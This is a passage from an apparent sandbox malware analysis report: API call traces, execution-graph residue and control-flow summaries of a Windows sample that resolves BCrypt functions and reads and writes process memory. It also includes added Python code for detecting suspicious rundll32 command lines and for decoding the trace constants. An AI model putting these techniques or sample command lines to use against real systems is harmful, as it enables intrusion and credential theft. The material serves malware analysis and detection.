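    {"ProcessId": 4188, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"ProcessId": 4201, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\Public\report.png",#2'},
    {"ProcessId": 4300, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo rundll32.exe"},
]

if __name__ == "__main__":
    for pid, finding in scan(SAMPLE_EVENTS):
        print(pid, finding)
```

The three checks are deliberately separate so each can be tuned on its own: the extension check is the high-signal one, the ordinal check is common in legitimate shell extensions and is best used as a score booster, and the C:\Windows root check catches the drop location this sample uses without firing on the System32 and SysWOW64 paths that normal rundll32 lines carry.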
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF6446
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF644D
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04BF6465
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: ByteCharHeapMultiWide$AllocProcess
                                              • String ID:
                                              • API String ID: 1432973188-0
                                              • Opcode ID: 2aa3054e4cf007e796d36756d948a9fcfad487a93157fc01ca9ae59771cec8f0
                                              • Instruction ID: 0a78aeadb2fd4058f0fa8b75ba2cc3cfce98f2e01f125723f32870cee50b8663
                                              • Opcode Fuzzy Hash: 2aa3054e4cf007e796d36756d948a9fcfad487a93157fc01ca9ae59771cec8f0
                                              • Instruction Fuzzy Hash: 04F06DB6A04118BFAB006FA89CC4C7FBBACEB452A47100276FA15E3280D2349D1556B0
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6CFC
                                              • HeapAlloc.KERNEL32(00000000,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6CFF
                                                • Part of subcall function 04BF6D35: EnterCriticalSection.KERNEL32(?,771AF380,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D46
                                                • Part of subcall function 04BF6D35: LeaveCriticalSection.KERNEL32(?,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D7F
                                                • Part of subcall function 04BF6D35: Sleep.KERNELBASE(00002710,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D97
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D24
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D27
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                              • String ID:
                                              • API String ID: 2739146912-0
                                              • Opcode ID: ecb59b986fe994a70505097e09c5477b99f1c62ee46a252046d05fdd320bc979
                                              • Instruction ID: 6bcd4010e19bb8df38a646a01018f67984665e7c4d865607e2aab8345fe4d3f4
                                              • Opcode Fuzzy Hash: ecb59b986fe994a70505097e09c5477b99f1c62ee46a252046d05fdd320bc979
                                              • Instruction Fuzzy Hash: A2E065722003097BEB106FE5DCC4F17BB9CFB94314F008066FA098B100CA74E8199770
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000), ref: 04BF6851
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6854
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF6860
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6863
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: e5fdc89dc49d45d167befc52a54b394d08e0e85095be741c863673244fd8a5a8
                                              • Instruction ID: 6662991924d32a31f7f1b176cd94d968e0ccf39caafb4b0926123c104f187bcb
                                              • Opcode Fuzzy Hash: e5fdc89dc49d45d167befc52a54b394d08e0e85095be741c863673244fd8a5a8
                                              • Instruction Fuzzy Hash: 46E0127270035867EA109ED6DCC4F17B79CDB94751F44407BEB08D7140C565EC058AB1
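
The "APIs" lines in the function blocks above are the most informative part of this section, but they are printed as raw hexadecimal stack slots: 00001000 and 00000004 in the VirtualAlloc call are MEM_COMMIT and PAGE_READWRITE, 00004000 in VirtualFree is MEM_DECOMMIT, 00000002 in CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS, 0000FDE9 in MultiByteToWideChar is code page 65001 (CP_UTF8), and 00002710 in Sleep is 10000 ms. The Python below is an added example, not code from the report: a parser for those trace lines that decodes the constants for the APIs it knows about, records which calls are marked "Part of subcall function", and lists any call that asks for an executable page protection. Joe Sandbox prints more slots than the API has parameters, so only the documented parameter positions are decoded; the sample text is copied from the blocks above and the constant tables are mine. Run on this section it finds no PAGE_EXECUTE transition at all: the VirtualProtect calls here only move pages between read-write and read-only, so if the buffer that memcpy fills is ever executed, the execute bit is set in a function this part of the report does not show.

```python
"""Decoder for the hexadecimal argument slots in Joe Sandbox "APIs" trace lines.
Added example; the parser and constant tables are mine, the sample lines are
copied from the function blocks above.  Only positions that are real parameters
of the named API are decoded, because the sandbox prints extra stack slots."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
        0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
ALLOC = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
FREE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
CODEPAGE = {0: "CP_ACP", 1: "CP_OEMCP", 65001: "CP_UTF8"}
TH32 = {0x2: "TH32CS_SNAPPROCESS", 0x8: "TH32CS_SNAPMODULE"}


def flag_names(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


# api -> {parameter index: decoder}; indices follow the documented prototypes.
DECODERS = {
    "VirtualAlloc": {2: lambda v: flag_names(v, ALLOC), 3: lambda v: flag_names(v, PAGE)},
    "VirtualProtect": {2: lambda v: flag_names(v, PAGE)},
    "VirtualFree": {2: lambda v: flag_names(v, FREE)},
    "MultiByteToWideChar": {0: lambda v: CODEPAGE.get(v, f"code page {v}")},
    "Sleep": {0: lambda v: f"{v} ms"},
    "CreateToolhelp32Snapshot": {0: lambda v: flag_names(v, TH32)},
}


@dataclass
class ApiCall:
    api: str
    dll: str
    ref: str
    args: list                        # ints where the slot was a number, "?" otherwise
    subcall_of: Optional[str] = None  # enclosing function when marked "Part of subcall"
    decoded: dict = field(default_factory=dict)


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    args = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else a for a in raw]
    call = ApiCall(m["api"], m["dll"], m["ref"].upper(), args, m["sub"])
    for index, decode in DECODERS.get(call.api, {}).items():
        if index < len(args) and isinstance(args[index], int):
            call.decoded[index] = decode(args[index])
    return call


def parse_trace(text: str) -> list:
    return [c for c in map(parse_line, text.splitlines()) if c is not None]


def executable_protections(calls: list) -> list:
    """Calls that allocate or re-protect memory with an EXECUTE protection."""
    return [c for c in calls if any("EXECUTE" in v for v in c.decoded.values())]


# Trace lines copied from the function blocks above.
SAMPLE_TRACE = """
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04BF79FC,?,?,?), ref: 04BF927B
• memcpy.MSVCRT ref: 04BF9294
• VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04BF9303
• VirtualFree.KERNEL32(00000000,?,00004000), ref: 04BF9323
  • Part of subcall function 04BF8F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 04BF8F52
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF8571
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
  • Part of subcall function 04BF6D35: Sleep.KERNELBASE(00002710,?,04BF6D1C,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D97
"""

if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for call in calls:
        tag = f" (in {call.subcall_of})" if call.subcall_of else ""
        print(f"{call.ref} {call.api}{tag}: {call.decoded or call.args}")
    print("executable protections:", [c.ref for c in executable_protections(calls)])
```

Paste the whole "APIs" section of a report into SAMPLE_TRACE to triage it in one pass; extending DECODERS with an API's documented parameter positions is all that is needed to cover further calls such as CreateFileW access masks or OpenProcess rights.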

                                              Execution Graph

                                              Execution Coverage:16.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2.4%
                                              Total number of Nodes:1066
                                              Total number of Limit Nodes:38
                                              execution_graph 3520 7ff6097557fc SetUnhandledExceptionFilter 3521 7ff60975453c 3524 7ff609756a58 3521->3524 3525 7ff609756a8a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3524->3525 3526 7ff609754545 3524->3526 3525->3526 3527 7ff6097557b8 3528 7ff6097557f1 3527->3528 3529 7ff6097557c7 3527->3529 3529->3528 3531 7ff6097582d8 3529->3531 3536 7ff609755284 3531->3536 3537 7ff609755200 _errno 62 API calls 3536->3537 3538 7ff60975528f 3537->3538 3539 7ff60975529f 3538->3539 3540 7ff609755bac _amsg_exit 62 API calls 3538->3540 3541 7ff6097590cc 3539->3541 3540->3539 3548 7ff60975833c DecodePointer 3541->3548 2899 7ff6097543c4 2900 7ff6097543dc 2899->2900 2939 7ff609756a00 HeapCreate 2900->2939 2903 7ff609754447 2944 7ff6097553dc 2903->2944 2905 7ff609754433 3025 7ff609755c00 2905->3025 2906 7ff60975442e 3016 7ff609755e60 2906->3016 2910 7ff609754472 _RTC_Initialize 2960 7ff6097566bc GetStartupInfoW 2910->2960 2913 7ff609754459 2915 7ff609755e60 _FF_MSGBANNER 62 API calls 2913->2915 2914 7ff60975445e 2916 7ff609755c00 malloc 62 API calls 2914->2916 2915->2914 2917 7ff609754468 2916->2917 2919 7ff609755850 malloc 3 API calls 2917->2919 2919->2910 2921 7ff60975448b GetCommandLineW 2973 7ff609756634 GetEnvironmentStringsW 2921->2973 2927 7ff6097544b7 2986 7ff609756274 2927->2986 2928 7ff609755bac _amsg_exit 62 API calls 2928->2927 2931 7ff6097544ca 3000 7ff609755934 2931->3000 2932 7ff609755bac _amsg_exit 62 API calls 2932->2931 2934 7ff6097544d4 2935 7ff6097544df 2934->2935 2936 7ff609755bac _amsg_exit 62 API calls 2934->2936 3006 7ff60975245c 2935->3006 2936->2935 2938 7ff6097544ff 2940 7ff609756a28 GetVersion 2939->2940 2941 7ff609754421 2939->2941 2942 7ff609756a4c 2940->2942 2943 7ff609756a32 HeapSetInformation 2940->2943 2941->2903 2941->2905 2941->2906 2942->2941 2943->2942 3072 7ff609755880 2944->3072 2946 7ff6097553e7 3076 7ff609757210 2946->3076 2949 7ff609755450 
3094 7ff609755120 2949->3094 2950 7ff6097553f0 FlsAlloc 2950->2949 2951 7ff609755408 2950->2951 3080 7ff609757520 2951->3080 2956 7ff60975541f FlsSetValue 2956->2949 2957 7ff609755432 2956->2957 3085 7ff609755148 2957->3085 2961 7ff609757520 __onexitinit 62 API calls 2960->2961 2972 7ff6097566f2 2961->2972 2962 7ff60975447d 2962->2921 3065 7ff609755bac 2962->3065 2963 7ff6097568c9 GetStdHandle 2968 7ff6097568a4 2963->2968 2964 7ff6097568f9 GetFileType 2964->2968 2965 7ff609757520 __onexitinit 62 API calls 2965->2972 2966 7ff609756819 2966->2968 2970 7ff609756852 InitializeCriticalSectionAndSpinCount 2966->2970 2971 7ff609756844 GetFileType 2966->2971 2967 7ff609756962 SetHandleCount 2967->2962 2968->2963 2968->2964 2968->2967 2969 7ff609756923 InitializeCriticalSectionAndSpinCount 2968->2969 2969->2962 2969->2968 2970->2962 2970->2966 2971->2966 2971->2970 2972->2962 2972->2965 2972->2966 2972->2968 2972->2972 2974 7ff609756658 2973->2974 2975 7ff60975449d 2973->2975 2977 7ff6097574a0 __wsetargv 62 API calls 2974->2977 2980 7ff609756544 GetModuleFileNameW 2975->2980 2978 7ff60975667f __initmbctable 2977->2978 2979 7ff609756698 FreeEnvironmentStringsW 2978->2979 2979->2975 2981 7ff609756584 __wsetargv 2980->2981 2982 7ff6097544a9 2981->2982 2983 7ff6097565df 2981->2983 2982->2927 2982->2928 2984 7ff6097574a0 __wsetargv 62 API calls 2983->2984 2985 7ff6097565e4 __wsetargv 2984->2985 2985->2982 2987 7ff6097562a7 malloc 2986->2987 2988 7ff6097544bc 2986->2988 2989 7ff609757520 __onexitinit 62 API calls 2987->2989 2988->2931 2988->2932 2996 7ff6097562d4 malloc 2989->2996 2990 7ff60975633c 2991 7ff609757460 __free_lconv_mon 62 API calls 2990->2991 2991->2988 2992 7ff609757520 __onexitinit 62 API calls 2992->2996 2993 7ff609756391 2994 7ff609757460 __free_lconv_mon 62 API calls 2993->2994 2994->2988 2996->2988 2996->2990 2996->2992 2996->2993 2997 7ff60975637c 2996->2997 3186 7ff609758bb0 2996->3186 3195 7ff60975568c 2997->3195 3002 7ff60975594a _cinit 3000->3002 3229 
7ff609758734 3002->3229 3003 7ff609755967 _initterm_e 3005 7ff60975598a _cinit 3003->3005 3232 7ff60975871c 3003->3232 3005->2934 3007 7ff609752475 RtlGetNtVersionNumbers RtlAdjustPrivilege 3006->3007 3008 7ff609752465 3006->3008 3010 7ff6097524f1 3007->3010 3011 7ff6097524b3 3007->3011 3249 7ff609752348 GetProcessHeap HeapAlloc 3008->3249 3014 7ff609752509 CloseHandle 3010->3014 3015 7ff60975250f 3010->3015 3258 7ff6097536d8 3011->3258 3014->3015 3015->2938 3451 7ff609758c1c 3016->3451 3019 7ff609755e7d 3021 7ff609755c00 malloc 62 API calls 3019->3021 3023 7ff609755e9e 3019->3023 3020 7ff609758c1c _set_error_mode 62 API calls 3020->3019 3022 7ff609755e94 3021->3022 3024 7ff609755c00 malloc 62 API calls 3022->3024 3023->2905 3024->3023 3026 7ff609755c34 malloc 3025->3026 3027 7ff609755d86 3026->3027 3028 7ff609758c1c _set_error_mode 59 API calls 3026->3028 3029 7ff6097571f0 malloc 8 API calls 3027->3029 3030 7ff609755c4a 3028->3030 3031 7ff60975443d 3029->3031 3032 7ff609755dc8 GetStdHandle 3030->3032 3033 7ff609758c1c _set_error_mode 59 API calls 3030->3033 3062 7ff609755850 3031->3062 3032->3027 3035 7ff609755ddb malloc 3032->3035 3034 7ff609755c5b 3033->3034 3034->3027 3034->3032 3036 7ff609758bb0 malloc 59 API calls 3034->3036 3035->3027 3037 7ff609755e15 WriteFile 3035->3037 3038 7ff609755c97 3036->3038 3037->3027 3039 7ff609755db4 3038->3039 3040 7ff609755ca1 GetModuleFileNameW 3038->3040 3042 7ff60975568c _invalid_parameter_noinfo 16 API calls 3039->3042 3041 7ff609755cc7 3040->3041 3047 7ff609755cf0 malloc 3040->3047 3043 7ff609758bb0 malloc 59 API calls 3041->3043 3044 7ff609755dc7 3042->3044 3045 7ff609755cd8 3043->3045 3044->3032 3045->3047 3049 7ff60975568c _invalid_parameter_noinfo 16 API calls 3045->3049 3046 7ff609755d48 3466 7ff609758a3c 3046->3466 3047->3046 3457 7ff609758ac4 3047->3457 3049->3047 3051 7ff609755d9f 3055 7ff60975568c _invalid_parameter_noinfo 16 API calls 3051->3055 3053 7ff609758a3c malloc 59 API calls 3056 7ff609755d6d 3053->3056 
[Execution graph data for LisectAVT_2403002C_35.exe, rendered here as node and edge residue: function nodes at 0x7ff609751000 through 0x7ff609759223 with their call edges and API-call counts. Windows APIs referenced by the graph nodes: GetModuleHandleW, GetProcAddress, LoadLibraryW, FreeLibrary, CreateFileW, WaitNamedPipeW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, OpenProcess, ReadProcessMemory, WriteProcessMemory, NtQuerySystemInformation, NtQueryInformationProcess, RtlGetCurrentPeb, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, RtlUnwindEx, GetCurrentProcess, TerminateProcess, ExitProcess, EncodePointer, DecodePointer, HeapAlloc, HeapFree, LocalAlloc, LocalFree, FlsGetValue, FlsSetValue, FlsFree, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, Sleep, GetLastError, SetLastError, GetCurrentThreadId, RtlInitUnicodeString, RtlEqualUnicodeString, SetFilePointer, FindCloseChangeNotification, CloseHandle, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, GetStringTypeW, GetCPInfo, IsValidCodePage, GetOEMCP, GetACP, IsCharAlphaNumericW, IsTextUnicode, wsprintfW, StrChrW. CRT-internal nodes: malloc, realloc, _errno, _invalid_parameter_noinfo, _getptd, _freefls, _lock, _amsg_exit, _cinit, _callnewh, __onexitinit, __initmbctable, __free_lconv_mon, __wsetargv, _initp_misc_winsig, _FF_MSGBANNER.]

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: InformationLocalQuerySystem$AddressAllocFreeHandleModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3225137318-3502785670
                                              • Opcode ID: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                              • Instruction ID: 1927a401834537f3ed10408c024240f8a3b4ab809437ecf8e27f44434f56ca86
                                              • Opcode Fuzzy Hash: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                              • Instruction Fuzzy Hash: 6E118273B28A5286F7948F15A80462927A2FB88BD5F684135DE0DC3764EFBDE445C304

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: CurrentProcess$InformationQuery
                                              • String ID:
                                              • API String ID: 4257070689-0
                                              • Opcode ID: bbb3386392f23902eb481ae4201445191efc0b08561d4a2dc4b3b2802b3fa859
                                              • Instruction ID: b04b8e730bfdcf28fe80ebb04e1258cbb87a3ae35a3f83ea4f7123e2f218bc41
                                              • Opcode Fuzzy Hash: bbb3386392f23902eb481ae4201445191efc0b08561d4a2dc4b3b2802b3fa859
                                              • Instruction Fuzzy Hash: A931B037B04B528AEBA48F51E840AAE3766FB04BC8F600035DE1D93754DF78E856C340

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleLibraryLoadModule
                                              • String ID: BCryenAlthmPder$BCrynerammeteyBCryenAlthmPder$BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGetProperty$BCryptSetProperty$LoadLibraryW$c$der$gori$kernel32$rovi$t$thmP$y
                                              • API String ID: 384173800-2409299874
                                              • Opcode ID: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                              • Instruction ID: 92922123dd16b456c50545b7363194fa6a05eeeb6f924c4cfd2ce7d7f14df4cd
                                              • Opcode Fuzzy Hash: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                              • Instruction Fuzzy Hash: EA51E273E19A42CAFB94CF62E8441783BB3BB84785F644139C91C96765EFBCA588C740

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FileMemoryPointerProcess$FreeLocalReadWrite
                                              • String ID: LocalAlloc$ReadFile$WriteFile$kernel32
                                              • API String ID: 1117553398-482538141
                                              • Opcode ID: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
                                              • Instruction ID: 95f15a81dc6352ee56ed3b6a45f63e81bc2d1046058d7d12c7c67b4a0ab542c0
                                              • Opcode Fuzzy Hash: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
                                              • Instruction Fuzzy Hash: CC513D77B18A8282EB949F16E85067D6362FB88BC5BA48135DA4EC7B54DF7CE844C300

                                              Control-flow Graph

                                              control_flow_graph 51 7ff60975196c-7ff6097519d1 52 7ff6097519d7-7ff6097519d9 51->52 53 7ff609751e78-7ff609751e89 call 7ff60975214c 51->53 54 7ff609751bd8-7ff609751bf3 call 7ff60975214c 52->54 55 7ff6097519df-7ff6097519e1 52->55 61 7ff609751e8b-7ff609751e93 53->61 62 7ff609751ee1-7ff609751eed 53->62 68 7ff609751f6e-7ff609751f83 54->68 72 7ff609751bf9-7ff609751c25 call 7ff609751170 54->72 58 7ff609751b3a-7ff609751b5c call 7ff609751624 55->58 59 7ff6097519e7-7ff6097519e9 55->59 58->68 77 7ff609751b62-7ff609751b66 58->77 63 7ff6097519eb-7ff6097519f0 59->63 64 7ff6097519f5-7ff609751a0a call 7ff609751864 59->64 67 7ff609751ed1-7ff609751edc 61->67 62->68 70 7ff609751eef-7ff609751ef1 62->70 63->68 64->68 80 7ff609751a10-7ff609751a28 64->80 74 7ff609751e95-7ff609751e97 67->74 75 7ff609751ede 67->75 70->68 76 7ff609751ef3-7ff609751f08 call 7ff60975214c 70->76 72->68 85 7ff609751c2b-7ff609751c3e 72->85 74->75 79 7ff609751e99-7ff609751ecd call 7ff609751f84 74->79 75->62 76->68 94 7ff609751f0a-7ff609751f11 76->94 82 7ff609751b68 77->82 83 7ff609751bd1-7ff609751bd3 77->83 79->67 80->68 87 7ff609751a2e-7ff609751a3d 80->87 89 7ff609751b6c-7ff609751b6e 82->89 83->68 91 7ff609751d1e-7ff609751d21 85->91 93 7ff609751a44-7ff609751a46 87->93 89->83 90 7ff609751b70-7ff609751b8f 89->90 96 7ff609751bc5-7ff609751bcf 90->96 97 7ff609751b91-7ff609751bc3 call 7ff609754104 RtlInitUnicodeString call 7ff609751f84 90->97 98 7ff609751d27-7ff609751d2c 91->98 99 7ff609751c43-7ff609751c45 91->99 93->68 100 7ff609751a4c-7ff609751a70 93->100 95 7ff609751f5e-7ff609751f69 94->95 104 7ff609751f6b 95->104 105 7ff609751f13-7ff609751f15 95->105 96->83 96->89 97->96 98->68 103 7ff609751d32-7ff609751d40 call 7ff60975214c 98->103 99->98 102 7ff609751c4b-7ff609751c72 call 7ff609751170 99->102 107 7ff609751a76-7ff609751a90 100->107 108 7ff609751b21-7ff609751b2f 100->108 125 7ff609751d16-7ff609751d1a 102->125 126 7ff609751c78-7ff609751ccb GetModuleHandleW GetProcAddress 
102->126 121 7ff609751d45-7ff609751d47 103->121 104->68 105->104 109 7ff609751f17-7ff609751f5a call 7ff609751f84 105->109 114 7ff609751a92-7ff609751ac4 GetModuleHandleW GetProcAddress 107->114 115 7ff609751ae5-7ff609751ae8 107->115 108->93 113 7ff609751b35 108->113 109->95 113->68 114->115 128 7ff609751ac6-7ff609751ad2 114->128 119 7ff609751b1a 115->119 120 7ff609751aea-7ff609751b14 RtlInitUnicodeString LocalFree 115->120 119->108 120->119 121->68 127 7ff609751d4d-7ff609751d7b call 7ff609751170 121->127 125->91 126->125 136 7ff609751ccd-7ff609751cf2 call 7ff609751170 126->136 127->68 137 7ff609751d81-7ff609751d90 127->137 128->115 131 7ff609751ad4-7ff609751ae3 128->131 131->115 131->131 143 7ff609751d0b-7ff609751d10 LocalFree 136->143 144 7ff609751cf4-7ff609751cf9 call 7ff609751f84 136->144 139 7ff609751e6a-7ff609751e6d 137->139 141 7ff609751e73 139->141 142 7ff609751d95-7ff609751d97 139->142 141->104 142->104 145 7ff609751d9d-7ff609751dc2 call 7ff609751170 142->145 143->125 148 7ff609751cfe-7ff609751d09 144->148 150 7ff609751dc8-7ff609751e19 GetModuleHandleW GetProcAddress 145->150 151 7ff609751e63-7ff609751e66 145->151 148->143 150->151 154 7ff609751e1b-7ff609751e3f call 7ff609751170 150->154 151->139 157 7ff609751e58-7ff609751e5d LocalFree 154->157 158 7ff609751e41-7ff609751e56 call 7ff609751f84 154->158 157->151 158->157
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 979628613-3502785670
                                              • Opcode ID: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
                                              • Instruction ID: f39eff5335bf9f7618a7d1155d4fdb7f2e94603a3d2cf310d540549a0689d8a1
                                              • Opcode Fuzzy Hash: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
                                              • Instruction Fuzzy Hash: C5023137A19B8286DBA0CF65E44076E73A2FB84795F900135EA5D87B98EF7CE544C700

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
